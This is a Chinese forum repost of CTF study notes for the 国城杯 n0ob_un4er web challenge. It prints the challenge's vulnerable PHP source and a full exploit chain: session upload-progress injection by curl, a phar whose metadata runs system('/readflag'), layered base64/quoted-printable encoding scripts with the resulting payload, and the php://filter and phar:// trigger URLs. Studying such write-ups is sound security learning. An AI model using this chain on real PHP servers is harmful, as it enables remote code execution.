ToB企服应用市场:ToB评测及商务社交产业平台
标题:
CTF-WEB php-Session 文件利用 [第一届国城杯 n0ob_un4er 赛后学习条记]
[打印本页]
作者:
瑞星
时间:
前天 03:46
标题:
CTF-WEB php-Session 文件利用 [第一届国城杯 n0ob_un4er 赛后学习条记]
step 1
搭建容器
教程
标题
github.com
Dockerfile 有点题目,手动修复一下
FROM php:7.2-apache
COPY ./flag /root
COPY ./readflag /
COPY ./html/ /var/www/html/
COPY ./php.ini /usr/local/etc/php/php.ini
COPY ./readflag /readsecret
RUN chmod 755 /var/www/html && chown -R root:www-data /var/www/html && chmod 400 /root/flag && chmod 4111 /readflag
复制代码
修改php ini
; session.upload_progress.cleanup = On
session.upload_progress.cleanup = Off
复制代码
不修改的话/tmp里的东西会被删掉,就看不了了
step 2
<?php
$SECRET = `/readsecret`;
include "waf.php";
class User {
public $role;
function __construct($role) {
$this->role = $role;
}
}
class Admin{
public $code;
function __construct($code) {
$this->code = $code;
}
function __destruct() {
echo "Admin can play everything!";
eval($this->code);
}
}
function game($filename) {
if (!empty($filename)) {
if (waf($filename) && @copy($filename , "/tmp/tmp.tmp")) {
echo "Well done!";
} else {
echo "Copy failed.";
}
} else {
echo "User can play copy game.";
}
}
function set_session(){
global $SECRET;
$data = serialize(new User("user"));
$hmac = hash_hmac("sha256", $data, $SECRET);
setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}
function check_session() {
global $SECRET;
$data = $_COOKIE["session-data"];
list($data, $hmac) = explode("-----", $data, 2);
if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac) || !hash_equals(hash_hmac("sha256", $data, $SECRET), $hmac)) {
die("hacker!");
}
$data = unserialize($data);
if ( $data->role === "user" ){
game($_GET["filename"]);
}else if($data->role === "admin"){
return new Admin($_GET['code']);
}
return 0;
}
if (!isset($_COOKIE["session-data"])) {
set_session();
highlight_file(__FILE__);
}else{
highlight_file(__FILE__);
check_session();
}
User can play copy game.
复制代码
我们可以利用Session临时文件,关于临时文件,请看以下文章
国城杯n0ob_un4er-wp - Litsasuk - 博客园
PHP: Session 上传进度 - Manual
浅谈 SESSION_UPLOAD_PROGRESS 的利用-腾讯云开发者社区-腾讯云
这里第二个file是什么不紧张,只要是文件就可以
curl http://127.0.0.1:1337/ -H 'Cookie: PHPSESSID=litsasuk' -F 'PHP_SESSION_UPLOAD_PROGRESS=[Your_data]' -F 'file=@/etc/passwd'
root@07710596cbbe:/# cd ./tmp
root@07710596cbbe:/tmp# ls
sess_litsasuk
root@07710596cbbe:/tmp# cat sess_litsasuk
upload_progress_[Your_data]|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码
step 3
copy可以通过伪协议触发phar反序列化
<?php
highlight_file(__FILE__);
class Admin{
public $code;
}
@unlink('test.phar');
$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$o=new Admin();
$o ->code="system('/readflag');";
$phar->setMetadata($o);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>
复制代码
step 4
试验
<?php
// 文件名
$inputFile = 'test'; // 输入文件名
$outputFile = 'test'; // 输出文件名
// 打开输入文件并读取内容
$inputHandle = fopen("php://filter/read=convert.base64-decode/resource=$inputFile", 'r');
if (!$inputHandle) {
die("无法打开输入文件: $inputFile");
}
// 读取解码后的内容
$decodedContent = stream_get_contents($inputHandle);
fclose($inputHandle);
// 打开输出文件并写入解码后的内容
$outputHandle = fopen($outputFile, 'w');
if (!$outputHandle) {
die("无法打开输出文件: $outputFile");
}
fwrite($outputHandle, $decodedContent);
fclose($outputHandle);
echo "文件解码并写回成功!";
?>
复制代码
原理部分
字符串“Man”的Base64编码
输入数据
:
字符串“Man”的ASCII码是:
M: 77 (01001101)
a: 97 (01100001)
n: 110 (01101110)
复制代码
归并成二进制数据:
01001101 01100001 01101110
复制代码
分成6位块
:
划分后得到:
010011 010110 000101 101110
复制代码
转换为十进制
:
每个6位块对应的整数是:
19 22 5 46
复制代码
映射到Base64字符集
:
使用Base64字符表对应的字符是:
T W F u
复制代码
因此,字符串“Man”被Base64编码后就是“TWFu”。
字符串“Ma”的Base64编码
输入数据
:
字符串“Ma”的ASCII码是:
M: 77 (01001101)
a: 97 (01100001)
复制代码
补齐到3字节
:
补齐后酿成:
01001101 01100001 00000000
复制代码
分成6位块
:
划分后得到:
010011 010110 000100 000000
复制代码
转换为十进制
:
每个6位块对应的整数是:
19 22 4 0
复制代码
映射到Base64字符集
:
使用Base64字符表对应的字符是:
T W E A
复制代码
添加填充字符
:
因为原始数据不足3字节,我们在末端添加一个等号(=),表现有1个字节填充。
终极效果是:
TWE=
试验开始
d2lu
复制代码
decode->
win
复制代码
and
----d2lu
复制代码
decode->
win
复制代码
试验得出结论,php在base64解码时会忽视base64表以外的内容,base64表如下
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
复制代码
upload_progress_ 的有用字符只有14个,以是
从docker抓取文件内容试验
upload_progress_aad2lu|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码
decode->
簷hi趉?薏茪win
k?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<
复制代码
我们能看到win
在其中
我们再双重编码一下win
ZDJsdUNnPT0
upload_progress_aaZDJsdUNnPT0|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
簷hi趉?薏茪d2luCg==嫱t仓卅z-{?}舆5砠^炠^?a媫第蛓o+^矚鑡?y胤踋?y絣屮频婩怀]夐]潻灣団曤8潻灣猌蔡乘f蛒榠 髣?9z鸿?,嶷'y絣譑-j籱奼⒆谨鬏=骩5寮瓃蔾∏鏱巯;
复制代码
我们能看到d2lu在其中,但是有一个题目,前面的有用字符不够了,只有两个破坏对齐了就没办法精确解码了,我们可以试试这样
编码 222—d2lu
YWEtLS1kMmx1
upload_progress_aaMjItLS1kMmx1=|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码
decode->
簷hi趉?薏茪22---d2luk?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<
复制代码
失败了,我们换个方法
Quoted-Printable
是一种用于编码数据的方式,特殊是在电子邮件传输(MIME 标准)中广泛使用。它的主要目的是确保数据在差别系统之间传输时保持同等性,制止因编码题目导致的数据破坏。
特点:
可读性
:大部分可打印的ASCII字符在编码后保持不变,因此人类可以在肯定程度上阅读编码后的内容。
安全性
:非ASCII字符和特殊字符会被编码为 =XX 的格式,其中 XX 是该字符的十六进制ASCII码。
换行处理惩罚
:长行会被拆分,并在行尾使用 = 表现续行。
Quoted-Printable 解码
Quoted-Printable 解码
是指将使用 Quoted-Printable 编码的数据转换回原始的可读格式。这个过程包括:
识别转义序列
:查找以 = 开头的序列,这些序列表现特定的字符。例如,=3D 表现 = 字符,=0A 表现换行符。
转换字符
:将这些转义序列转换回它们对应的原始字符。
处理惩罚换行
:移除行尾的 = 并归并拆分的行。
这个东西编码后的密文只会是3的倍数,确保了对齐,我们直接用wp的有用负载研究原理
<?php
// 假设这是经过编码处理的最终 Base64 编码字符串
$encoded_string = file_get_contents('./test.txt');
// 第一步:Base64 解码
$base64_decoded = base64_decode($encoded_string);
$base64_decoded = base64_decode($base64_decoded);
$base64_decoded = base64_decode($base64_decoded);
echo "Step 1 - Base64 Decode:
";
echo $base64_decoded . "
";
// 第二步:Quoted-Printable 解码
$quoted_printable_decoded = quoted_printable_decode($base64_decoded);
echo "Step 2 - Quoted-Printable Decode:
";
echo $quoted_printable_decoded . "
";
// 第四步:Base64 解码(再次)
$final_decoded = base64_decode($quoted_printable_decoded);
echo "Step 4 - Final Base64 Decode:
";
echo $final_decoded . "
";
?>
import base64
# 读取文件内容
with open('test.phar', 'rb') as file:
file_content = file.read()
# 第一步:将文件内容进行 Base64 编码
base64_encoded = base64.b64encode(file_content).decode('utf-8')
# 第二步:将 Base64 编码后的内容转换为指定的格式
encoded_str = ''.join(['=' + hex(ord(char))[2:] + '=00' for char in base64_encoded]).upper()
# 打印结果
print(encoded_str)
upload_progress_ZZVUZSVmQxQlVRWGRRVkZFd1VGUkJkMUJVVFRWUVZFRjNVRlJqTTFCVVFYZFFWRmw0VUZSQmQxQlVVVFJRVkVGM1VGUlJlRkJVUVhkUVZGa3pVRlJCZDFCVVZUUlFWRUYzVUZSTmVGQlVRWGRRVkUwMVVGUkJkMUJVVVRWUVZFRjNVRlJWZUZCVVFYZFFWRlV4VUZSQmQxQlVZelJRVkVGM1VGUlZNVkJVUVhkUVZGVTBVRlJCZDFCVVRYZFFWRUYzVUZSU1JsQlVRWGRRVkZWM1VGUkJkMUJVVlRCUVZFRjNVRlJWTWxCVVFYZFFWRkY1VUZSQmQxQlVVa0pRVkVGM1VGUlZNRkJVUVhkUVZGRXhVRlJCZDFCVVZUSlFWRUYzVUZSVmVsQlVRWGRRVkZKRFVGUkJkMUJVVVhwUVZFRjNVRlJhUTFCVVFYZFFWRTB6VUZSQmQxQlVVVFZRVkVGM1VGUlJNRkJVUVhkUVZFMDBVRlJCZDFCVVNrTlFWRUYzVUZSUk1GQlVRWGRRVkZWNFVGUkJkMUJVWTNkUVZFRjNVRlJqTUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSVmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY1VUZSQmQxQlVVVEZRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNVVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSTmVsQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVWVEJRVkVGM1VGUmtRbEJVUVhkUVZGcEhVRlJCZDFCVVRYaFFWRUYzVUZSU1IxQlVRWGRRVkZrMVVGUkJkMUJVVWtKUVZFRjNVRlJSZVZCVVFYZFFWRlpDVUZSQmQxQlVVVE5RVkVGM1VGUk5lRkJVUVhkUVZHTjNVRlJCZDFCVVdYbFFWRUYzVUZSWk5WQlVRWGRRVkZFMVVGUkJkMUJVVFRKUVZFRjNVRlJTUlZCVVFYZFFWRlV3VUZSQmQxQlVZM2RRVkVGM1VGUk5NMUJVUVhkUVZGbDZVRlJCZDFCVVpFSlFWRUYzVUZSYVIxQlVRWGRRVkUxM1VGUkJkMUJVVWtkUVZFRjNVRlJaTlZCVVFYZFFWRkpDVUZSQmQxQlVXa0pRVkVGM1VGUlplVkJVUVhkUVZFMTVVRlJCZDFCVVZYbFFWRUYzVUZSYVJGQlVRWGRRVkZFMVVGUkJkMUJVV2tKUVZFRjNVRlJqTUZCVVFYZFFWR1JDVUZSQmQxQlVVa2RRVkVGM1VGUmFRbEJVUVhkUVZGRTFVRlJCZDFCVVl6TlFWRUYzVUZSU1IxQlVRWGRRVkZrMVVGUkJkMUJVVWtKUVZFRjNVRlJrUWxCVVFYZFFWRmt4VUZSQmQxQlVWVFJRVkVGM1VGUlNSbEJVUVhkUVZFMTNVRlJCZDFCVVZrSlFWRUYzVUZSVk0xQlVRWGRRVkUxM1VGUkJkMUJVV2tkUVZFRjNVRlJTUWxCVVFYZFFWR00xVUZSQmQxQlVUVFZRVkVGM1VGUmpOVkJVUVhkUVZGWkNVRlJCZDFCVVZUTlFWRUYzVUZSUk1sQlVRWGRRVkZwRFVGUkJkMUJVVmtKUVZFRjNVRlJhUlZCVVFYZFFWR00wVUZSQmQxQlVXVFJRVkVGM1VGUldRbEJVUVhkUVZHTTFVRlJCZDFCVVdYcFFWRUYzVUZSamQxQlVRWGRRVkZKSFVGUkJkMUJVWXpWUVZFRjNVRlJSTlZCVVFYZFFWRTB6VUZSQmQxQlVXVEpRVkVGM1VGUlZlRkJVUVhkUVZGa3pVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhsUVZFRjNVRlJOZDFCVVFYZFFWRlpDVUZSQmQxQlVWVFJRVkVGM1VGUlNSbEJVUVhkUVZFMTNVRlJCZDFCVVVrUlFWRUYzVUZSYVJsQlVRWGRRVkZWNVVGUkJkMUJVVFRCUVZFRjNVRlJaTUZCVVFYZFFWRkY0VUZSQmQxQlVWWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUk1GQlVRWGRRVkZrd1VGUkJkMUJVVlRSUVZFRjNVRlJSZVZCVVFYZFFWR013VUZSQmQxQlVXa1pRVkVGM1VGUlJlVkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJqTkZCVVFYZFFWRXBEVUZSQmQxQlVXVEpRVkVGM1VGUk5OVkJVUVhkUVZGazFVRlJCZDFCVVRYbFFWRUYzVUZSUmVGQlVRWGRRVkZWNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUk5GQlVRWGRRVkZWNVVGUkJkMUJVV2tSUVZFRjNVRlJaZWxCVVFYZFFWRTE2VUZSQmQxQlVWWGxRVkVGM1VGUlNRbEJVUVhkUVZGVjVVRlJCZDFCVVVrZFFWRUYzVUZSTmQxQlVRWGRRVkdNeVVGUkJkMUJVVlRWUVZFRjNVRlJqTVZCVVFYZFFWRkpEVUZSQmQxQlVUVEZRVkVGM1VGUk5NVkJVUVhkUVZGSkNVRlJCZDFCVVRYcFFWRUYzVUZSV1FsQlVRWGRRVkdONVVGUkJkMUJVU2tOUVZFRjNVRlJSTkZCVVFYZFFWR04zVUZSQmQxQlVUVEJRVkVGM1VGUk5NMUJVUVhkUVZGRXlVRlJCZDFCVVVrTlFWRUYzVUZSWk5GQlVRWGRRVkZwSFVGUkJkMUJVVlRCUVZFRjNVRlJaTWxCVVFYZFFWRkV6VUZSQmQxQlVZek5RVkVGM1VGUlJOVkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNVVGUkJkMUJVVVRSUVZFRjNVRlJWZUZCVVFYZFFWRnBEVUZSQmQxQlVUWGhRVkVGM1VGUlJlbEJVUVhkUlZVWkNVVlZHUWxGVlJrSlJWVVpD|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
复制代码
注意,必须填充A(解码后为0)确保每次加密后不存在=
Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAw? Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAw? Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt?g~?testID?/b??????J???GBMB
复制代码
不填充ZZ填充FF也可以,主要在于其解码后字符化为的有用字符数是否能对齐(自己解码试试!)
Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAw? Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAw? Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt?g~?testID?/b??????J???GBMB
复制代码
step 5
1.让copy从临时文件读取数据到/tmp/tmp.tmp
?filename=php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=filename
复制代码
此处利用方法不唯一,大概有更简单的
字符串过滤器
转换过滤器
2.从tmp中解码文件并剖析phar中的test.txt文件触发反序列化来实验命令(如果没关php默认清除需要条件竞争)
phar:///tmp/tmp.tmp/test.txt
复制代码
end – 24-12-12
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)
Powered by Discuz! X3.4